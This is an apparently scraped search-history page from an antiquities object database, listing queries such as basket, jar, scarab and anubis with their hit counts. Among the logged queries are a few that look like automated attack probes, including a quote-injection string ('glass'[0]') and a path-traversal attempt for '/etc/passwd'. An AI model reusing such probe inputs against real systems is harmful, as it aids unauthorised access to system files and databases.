(hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for gauntlet - (hits/occ.: 15)Results List for garland - (hits/occ.: 2)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for bouquet - (hits/occ.: 6)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for glass - (hits/occ.: 28)Results List for mask - (hits/occ.: 1)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for fruit - (hits/occ.: 9)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for gauntlet - (hits/occ.: 15)Results List for anubis - (hits/occ.: 5)Results List for garland - (hits/occ.: 2)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for glass - (hits/occ.: 28)Results List for bouquet - (hits/occ.: 6)Results List for glove - (hits/occ.: 10)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for loin - (hits/occ.: 25)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for glass - (hits/occ.: 28)Results List for glass'[0] - (hits/occ.: 0)Results List for /etc/passwd - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for anubis - (hits/occ.: 5)Results List for mask - (hits/occ.: 1)Results List for gauntlet - (hits/occ.: 15)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for glass - (hits/occ.: 28)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for bouquet - (hits/occ.: 6)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for 1 - (hits/occ.: 145)Results List for 1 - (hits/occ.: 145)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for bouquet - (hits/occ.: 6)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for bouquet - (hits/occ.: 6)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for garland - (hits/occ.: 2)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for bouquet - (hits/occ.: 6)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for fruit - (hits/occ.: 9)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for seal - (hits/occ.: 16)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for scarab - (hits/occ.: 15)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for chariot - (hits/occ.: 135)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for garland - (hits/occ.: 2)Results List for bow%2b - (hits/occ.: 0)Results List for fruit - (hits/occ.: 9)Results List for anubis - (hits/occ.: 5)Results List for de - (hits/occ.: 418)Results List for glass - (hits/occ.: 28)Results List for glove - (hits/occ.: 10)Results List for gauntlet - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for wreath - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for seal - (hits/occ.: 16)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for garland - (hits/occ.: 2)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for 0&qtx - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for basket - 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(hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for gauntlet - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for basket - (hits/occ.: 128)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for shield - 